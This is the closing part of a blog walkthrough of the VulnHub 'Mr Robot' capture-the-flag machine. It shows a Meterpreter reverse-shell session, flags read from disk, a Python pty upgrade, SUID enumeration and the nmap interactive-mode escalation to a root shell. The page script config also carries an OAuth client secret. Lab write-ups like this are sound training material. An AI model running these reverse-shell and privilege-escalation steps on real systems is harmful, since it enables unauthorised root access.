<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/handler) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.0.106:4567 </span><br><span class="line">[*] Sending stage (39927 bytes) to 192.168.0.105</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.0.106:4567 -&gt; 192.168.0.105:60842) at 2024-07-24 02:28:06 -0400</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>get flag</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /home/robot/key-2-of-3.txt</span><br><span class="line">822c73956184f694993bede3eb39f959</span><br></pre></td></tr></table></figure>


<h2 id="root-privilege"><a href="#root-privilege" class="headerlink" title="root privilege"></a>root privilege</h2><h3 id="python"><a href="#python" class="headerlink" title="python"></a>python</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/sh&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<h3 id="suid"><a href="#suid" class="headerlink" title="suid"></a>suid</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm /4000 -type f 2&gt;/tmp/2</span><br></pre></td></tr></table></figure>


<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>
<p>get</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">/bin/ping</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/mount</span><br><span class="line">/bin/ping6</span><br><span class="line">/bin/su</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/usr/local/bin/nmap</span><br></pre></td></tr></table></figure>

<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p>nmap version 3.81 bug</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap --interactive</span><br><span class="line">!/bin/sh</span><br></pre></td></tr></table></figure>

<p>get flag</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat key-3-of-3.txt</span><br><span class="line">04787ddef27c3dee1ee161b21670b4e4</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>Buy me a coffee</div>
  <button>
    Donate
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/bitcoin.png" alt="vkkkv Bitcoin">
        <span>Bitcoin</span>
      </div>
      <div>
        <img src="/images/monero.png" alt="vkkkv monero">
        <span>monero</span>
      </div>

  </div>
</div>

          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>Post author:  </strong>vkkkv
  </li>
  <li class="post-copyright-link">
      <strong>Post link: </strong>
      <a href="https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/" title="vulnhub MrRobot">https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/</a>
  </li>
  <li class="post-copyright-license">
      <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC8="><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

          <div class="followme">
  <span>Welcome to my other publishing channels</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="https://t.me/+hL5fGHbRbEJhYjRl">
            <span class="icon">
              <i class="fab fa-telegram"></i>
            </span>

            <span class="label">Telegram</span>
          </a>
      </div>

      <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
              <a href="/tags/vulnhub/" rel="tag"><i class="fa fa-tag"></i> vulnhub</a>
          </div>

        
  <div class="social-like a2a_kit a2a_kit_size_32 a2a_default_style">
    <a class="a2a_dd" target="_blank" rel="noopener" href="https://www.addtoany.com/share"></a>
      <a class="a2a_button_facebook"></a>
      <a class="a2a_button_twitter"></a>
      <a class="a2a_button_telegram"></a>
      <a class="a2a_button_wechat"></a>
      <a class="a2a_button_qzone"></a>
  </div>

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/07/11/cyber/osint/OSINT/" rel="prev" title="OSINT">
                  <i class="fa fa-angle-left"></i> OSINT
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/08/01/thoughts/blogChange/" rel="next" title="blogChange">
                  blogChange <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
  <div class="languages">
    <label class="lang-select-label">
      <i class="fa fa-language"></i>
      <span>English</span>
      <i class="fa fa-angle-up" aria-hidden="true"></i>
    </label>
    <select class="lang-select" data-canonical="" aria-label="Select language">
      
        <option value="en" data-href="/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/" selected="">
          English
        </option>
      
        <option value="zh-CN" data-href="/zh-CN/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/" selected="">
          简体中文
        </option>
      
    </select>
  </div>

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">vkkkv</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="Word count total">NaNm</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">NaN:aN</span>
  </span>
</div>
  <div class="powered-by">Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZy9waXNjZXMv">NexT.Pisces</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <span class="exturl github-corner" data-url="aHR0cHM6Ly9naXRodWIuY29tL3Zra2t2" title="Follow me on GitHub" aria-label="Follow me on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></span>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script size="300" alpha="0.6" zIndex="-1" src="https://cdn.jsdelivr.net/npm/ribbon.js@1.0.2/dist/ribbon.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@next-theme/pjax@0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.31/dist/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/lozad@1.16.0/dist/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/pangu@4.0.7/dist/browser/pangu.min.js" integrity="sha256-j+yj56cdEY2CwkVtGyz18fNybFGpMGJ8JxG3GSyO2+I=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script><script src="/js/pjax.js"></script>

  <script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.1/dist/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdn.jsdelivr.net/npm/mermaid@10.9.0/dist/mermaid.min.js","integrity":"sha256-stuqcu2FrjYCXDOytWFA5SoUE/r3nkp6gTglzNSlavU="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>

  <script class="next-config" data-name="wavedrom" type="application/json">{"enable":true,"js":{"url":"https://cdn.jsdelivr.net/npm/wavedrom@3.5.0/wavedrom.min.js","integrity":"sha256-INLAoJc6quTNfiMWkGZniYO2cxE8mHpddnLow1m6RFs="}}</script>
  <script class="next-config" data-name="wavedrom_skin" type="application/json">{"enable":true,"js":{"url":"https://cdn.jsdelivr.net/npm/wavedrom@3.5.0/skins/default.js","integrity":"sha256-fduc/Zszk5ezWws2uInY/ALWVmIrmV6VTgXbsYSReFI="}}</script>
  <script src="/js/third-party/tags/wavedrom.js"></script>

  <script src="/js/third-party/fancybox.js"></script>

  <script src="/js/third-party/pace.js"></script>

  <script src="/js/third-party/addtoany.js"></script>

  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


  <script src="https://cdn.jsdelivr.net/npm/quicklink@2.3.0/dist/quicklink.umd.js" integrity="sha256-yvJQOINiH9fWemHn0vCA5lsHWJaHs6/ZmO+1Ft04SvM=" crossorigin="anonymous"></script>
  <script class="next-config" data-name="quicklink" type="application/json">{"enable":true,"home":true,"archive":true,"delay":true,"timeout":3000,"priority":true,"url":"https://vkkkv.github.io/2024/07/24/CTFNoob/ctf2vulnhubMrRobot/"}</script>
  <script src="/js/third-party/quicklink.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"vkkkv","repo":"Gitalk-comments","client_id":"Ov23liHHcW9X9fNucHfM","client_secret":"f70b1cfa789bb3efe479be8ae523bc914932e8a0","admin_user":"vkkkv","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":null,"js":{"url":"https://cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.min.js","integrity":"sha256-MVK9MGD/XJaGyIghSVrONSnoXoGh3IFxLw0zfvzpxR4="},"path_md5":"87b295086b9fb0c95dd2ff5df9ce340f"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>
